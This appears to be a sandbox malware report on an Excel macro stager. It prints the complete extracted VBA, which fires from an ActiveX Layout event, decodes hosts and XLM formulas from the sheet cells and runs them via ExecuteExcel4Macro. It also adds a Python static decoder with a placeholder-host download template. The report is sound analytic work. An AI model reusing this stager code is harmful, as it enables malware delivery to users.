Verdict: MALICIOUS (risk score 80)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution
The critical heuristic fires because the `Layout` event of the MSForms Frame declared by `Attribute VB_Control` (`clientnumber_Layout`) calls `abstractus` without any `Auto_Open` or `Workbook_Open` handler. `abstractus` concatenates the hex-decoded contents of every constant cell on the active sheet, splits the result at `=` into a `!`-separated host list and a `!`-separated set of XLM formula templates, picks one host at random (the index range 0..54 implies 55 candidates), substitutes it for the `?` placeholder in each template, hands every result longer than 15 characters to `ExecuteExcel4Macro` through `mailclient`, and then closes the workbook without saving. This is a common stager shape: the sheet cells carry the second-stage download logic, and the URLs reconstructed from them are the primary indicators of compromise. No exploit is involved; the chain runs only once macros are enabled, so T1204.002 (User Execution: Malicious File) describes the initial execution more precisely than T1203.
Heuristics (2)
- VBA project inside OOXML (medium, 1 related finding) OOXML_VBA: Document contains a VBA project; VBA macros present.
- VBA ActiveX event launches decoded Excel4 macro (critical) OLE_VBA_ACTIVEX_XLM_STAGER: The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro while the decompressed source does not, which is the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 APIs or drop payloads, hidden from source-level scanners. Caveat for this sample: the olevba-extracted source previewed below does contain the ExecuteExcel4Macro call (in mailclient) and the clientnumber_Layout handler, so the rule's "absent from source" condition should be confirmed by dumping the p-code (for example with pcodedmp) and diffing its identifier table against the source before reporting stomping.
Extracted artifacts (3)
Files carved from inside the sample during analysis.
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| macros.bas | 88751d0fe5dcba6af91578b21696d72c5dfd568ef10e68e66cf41a0f9fb94488 | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1633 bytes |
Preview of macros.bas (first 1,000 lines of the extracted script):
```vb
' analyst note: two modules concatenated by olevba: ThisWorkbook (empty), then Sheet1, which holds all the code.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' analyst note: embedded MSForms Frame named "clientnumber"; its Layout event is the trigger (see bottom).
Attribute VB_Control = "clientnumber, 16, 0, MSForms, Frame"
Function hk()
hk = 65
End Function
' analyst note: hex decoder. Reads 2 chars at positions 1, 4, 7, ... (skips every third char)
' and maps each pair through mailclient, which decodes it with Chr(Val("&h" & pair)).
Public Function nod(ByVal ye As String) As String
Dim Y As Long
Dim fd As String
Dim vf As String
For Y = 1 To Len(ye) Step 3
fd = Mid(ye, Y, 2): vf = vf & mailclient(fd)
Next Y
nod = vf
End Function
' analyst note: dual-purpose helper. Short inputs (hex pairs) are decoded; anything longer than
' 15 characters is passed straight to ExecuteExcel4Macro, i.e. run as an XLM formula.
Function mailclient(Y As String) As String
If Len(Y) > 15 Then ExecuteExcel4Macro Y
mailclient = Chr(Val("&h" & Y))
End Function
' analyst note: main routine. Concatenates the decoded contents of every constant cell on the
' active sheet, splits at "=" into a "!"-separated host list (g(0)) and "!"-separated formula
' templates (g(1)), picks one of 55 hosts at random (index 0..54), substitutes it for "?" in
' each template, runs each through mailclient/ExecuteExcel4Macro, then closes the workbook
' without saving (Len(s) - Len(s) = 0 = SaveChanges:=False).
Sub abstractus()
s = 78: Randomize
Dim vg As String, r As String, t As String
For Each p In ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
k = k + nod(p)
Next
g = Split(k, "=")
bocos = Split(g(0), "!")
tangt = g(1)
vg = bocos(Int((54 - 0 + 1) * Rnd + 0))
poupss = Split(tangt, "!")
For Each f In poupss
u = ecotime(f, "?", vg)
mailclient (u)
Next
ActiveWorkbook.Close Len(s) - Len(s)
End Sub
' analyst note: Replace wrapper used for the "?" -> host substitution.
Function ecotime(hj, sd, er As String)
ecotime = Replace(hj, sd, er)
End Function
' analyst note: auto-firing entry point. The Frame control's Layout event fires when the control
' is laid out on open, so no Auto_Open/Workbook_Open is needed; "dear = hk * 21" is filler.
Private Sub clientnumber_Layout()
dear = hk * 21: abstractus
End Sub
```
Remaining carved artifacts:
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| vbaProject_00.bin | 0f567b77307151a83cbb47355f0a04bf8d29e1f2c06c81de0cb4e4a18158709f | vba-project | OOXML VBA project: xl/vbaProject.bin | 18432 bytes |
| emf_00.emf | 289f5a4af0055ab9abbe8cf110fe4e3827407560145dba39aa21028b266662a2 | ooxml-emf | OOXML EMF part: xl/media/image1.emf | 1976 bytes |
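The decoding and dispatch logic of the extracted macro (nod, mailclient, ecotime and abstractus), re-implemented statically in Python so the hosts and XLM formulas can be recovered from the sheet cells without ever calling ExecuteExcel4Macro. This is an added example, not part of the analyzer's report or of the sample: the cell contents, hosts, formula templates and separator character are constructed here to mirror the encoding the macro expects (the real sample's payload is not on this page), and unlike the macro, which picks one of 55 hosts with Rnd, it expands every host so all candidate URLs surface. The stomping_candidates helper models the identifier-table comparison behind the OLE_VBA_ACTIVEX_XLM_STAGER heuristic; the p-code identifier list it is fed is likewise constructed.

```python
"""Static port of the macros.bas decoder (added example; sample data is constructed)."""
import re

SEP = "-"  # ASSUMPTION: real separator unknown; nod() simply skips every third character


def val_hex(s: str) -> int:
    """Mimic VBA Val("&h" & s): parse leading hex digits, 0 when there are none
    (the macro then yields Chr(0))."""
    m = re.match(r"[0-9A-Fa-f]+", s)
    return int(m.group(), 16) if m else 0


def nod(ye: str) -> str:
    """Port of Public Function nod(): Mid(ye, Y, 2) for Y = 1, 4, 7, ...,
    each pair hex-decoded the way mailclient() does for short inputs."""
    return "".join(chr(val_hex(ye[y:y + 2])) for y in range(0, len(ye), 3))


def ecotime(hj: str, sd: str, er: str) -> str:
    """Port of ecotime(): plain Replace()."""
    return hj.replace(sd, er)


def encode_cells(text: str, sep: str = SEP) -> str:
    """Inverse of nod(); used here only to build the constructed sample cells."""
    return "".join(f"{ord(c):02X}{sep}" for c in text)


def reconstruct(cell_values, min_len: int = 16) -> dict:
    """Static port of Sub abstractus() with ExecuteExcel4Macro replaced by recording.
    Returns {host: [formula, ...]} holding only the strings mailclient() would
    actually execute (Len > 15); every host is expanded, not one chosen by Rnd."""
    k = "".join(nod(str(p)) for p in cell_values)  # k = k + nod(p) over the cells
    g = k.split("=")                                # g = Split(k, "=")
    hosts = g[0].split("!")                         # bocos = Split(g(0), "!")
    templates = g[1].split("!")                     # poupss = Split(g(1), "!")
    expanded = {}
    for vg in hosts:                                # instead of bocos(Int(55 * Rnd))
        formulas = [ecotime(f, "?", vg) for f in templates]
        expanded[vg] = [u for u in formulas if len(u) >= min_len]
    return expanded


def stomping_candidates(pcode_identifiers, source_text: str) -> set:
    """Model of the OLE_VBA_ACTIVEX_XLM_STAGER check: names present in the p-code
    identifier table (e.g. as listed by pcodedmp) that never appear as a token in
    the decompressed source. VBA identifiers are case-insensitive."""
    tokens = {t.lower() for t in re.findall(r"[A-Za-z_]\w*", source_text)}
    return {n for n in pcode_identifiers if n.lower() not in tokens}


# Constructed sample: three placeholder hosts and two formula templates, encoded the
# way the macro expects and split into 30-character "cells" (a multiple of 3, so each
# cell decodes on its own exactly as the macro decodes cell by cell).
HOSTS = ["hostA.example", "hostB.example", "hostC.example"]
TEMPLATES = ['CALL("constructed.dll","Stage2","JC","http://?/p")', "?"]
_ENCODED = encode_cells("!".join(HOSTS) + "=" + "!".join(TEMPLATES))
SAMPLE_CELLS = [_ENCODED[i:i + 30] for i in range(0, len(_ENCODED), 30)]

# Lines taken from the macros.bas preview on this page, used for the stomping check.
SOURCE_EXCERPT = """If Len(Y) > 15 Then ExecuteExcel4Macro Y
Private Sub clientnumber_Layout()"""

if __name__ == "__main__":
    for host, formulas in reconstruct(SAMPLE_CELLS).items():
        for f in formulas:
            print(f"{host}: {f}")
    # Constructed identifier list: "Shell" is the one the source never mentions.
    print("p-code-only identifiers:",
          stomping_candidates(["ExecuteExcel4Macro", "clientnumber_Layout", "Shell"],
                              SOURCE_EXCERPT))
```

For a real sample, feed reconstruct() the constant cells of the active sheet in the same row-major order that UsedRange.SpecialCells(xlCellTypeConstants) yields (openpyxl or olevba's XLM/cell dumps both work), and note that the short "?" template is dropped because the macro's 15-character gate would never execute it.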